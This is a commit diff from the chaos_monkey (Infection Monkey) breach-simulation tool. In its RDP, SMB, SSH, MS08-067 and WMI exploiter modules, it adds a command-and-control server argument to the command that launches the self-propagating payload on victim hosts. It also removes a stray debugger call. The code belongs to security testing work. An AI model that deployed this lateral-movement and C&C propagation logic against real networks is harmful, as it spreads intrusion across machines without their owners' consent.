GC-4600: monkey is propagating current C&C server

chaos_monkey/exploit/rdpgrinder.py

@@ -255,9 +255,9 @@ class RdpExploiter(HostExploiter):
             return False
 
         if self._config.rdp_use_vbs_download:
-            command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
+            command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
         else:
-            command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
+            command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
 
         passwords = list(self._config.psexec_passwords[:])
         known_password = host.get_credentials(self._config.psexec_user)

chaos_monkey/exploit/smbexec.py

@@ -105,6 +105,8 @@ class SmbExploiter(HostExploiter):
 
         if host.default_tunnel:
             cmdline += " -t " + host.default_tunnel
+        if host.default_server:
+            cmdline += " -s " + host.default_server
 
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))

chaos_monkey/exploit/sshexec.py

@@ -119,6 +119,8 @@ class SSHExploiter(HostExploiter):
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
             if host.default_tunnel:
                 cmdline += " -t " + host.default_tunnel
+            if host.default_server:
+                cmdline += " -s " + host.default_server
             
             cmdline += "&"
             ssh.exec_command(cmdline)

chaos_monkey/exploit/win_ms08_067.py

@@ -251,6 +251,8 @@ class Ms08_067_Exploiter(HostExploiter):
 
         if host.default_tunnel:
             cmdline += " -t " + host.default_tunnel
+        if host.default_server:
+            cmdline += " -s " + host.default_server
 
         try:
             sock.send("start %s\r\n" % (cmdline, ))

chaos_monkey/exploit/wmiexec.py

@@ -86,6 +86,8 @@ class WmiExploiter(HostExploiter):
 
             if host.default_tunnel:
                 cmdline += " -t " + host.default_tunnel
+            if host.default_server:
+                cmdline += " -s " + host.default_server
 
             # execute the remote monkey
             result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,

chaos_monkey/model/host.py

@@ -9,6 +9,7 @@ class VictimHost(object):
         self.services = {}
         self.monkey_exe = None
         self.default_tunnel = None
+        self.default_server = None
 
     def as_dict(self):
         return self.__dict__
@@ -36,3 +37,6 @@ class VictimHost(object):
 
     def get_credentials(self, username):
         return self.cred.get(username.lower(), None)
+
+    def set_default_server(self, default_server):
+        self.default_server = default_server

chaos_monkey/transport/http.py

@@ -112,13 +112,10 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
         # just provide a tunnel, transfer the data with no modification
         req = self
         reqbody = None
-        import pdb
-        pdb.set_trace()
         req.path = "https://%s/" % req.path.replace(':443', '')
 
         u = urlsplit(req.path)
         address = (u.hostname, u.port or 443)
-        uri = u
         try:
             conn = socket.create_connection(address)
         except socket.error: